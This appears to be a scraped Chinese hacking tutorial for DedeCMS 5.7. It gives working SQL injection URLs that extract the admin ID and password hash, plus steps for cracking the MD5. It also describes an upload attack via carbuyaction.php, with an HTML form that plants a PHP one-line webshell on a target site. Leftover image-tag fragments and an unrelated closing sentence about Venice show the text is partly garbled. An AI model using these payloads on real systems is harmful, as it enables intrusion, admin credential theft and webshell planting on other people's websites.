注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
650) this.width=650;” src=”http://cdn.verydemo.com/upload/2013_04_30/13672548373210.jpg” alt=”dedecms5.7注入和上传漏洞” />
然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select userid from `%23@__admin` where 1 or id=@`’` 查看管理员id
/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’` 查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
650) this.width=650;” src=”http://cdn.verydemo.com/upload/2013_04_30/13672548385081.jpg” alt=”dedecms5.7注入和上传漏洞” />
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post]
<[/url">http://www.si1ence.cn/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">file:<input name="uploadfile" type="file" /><br>newname:<input name="newname" type="text" value="myfile.Php"/><button class="button2" type="submit">提交</button><br><br>
把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。
那么威尼斯就是一艘轻盈和流动的舟船,
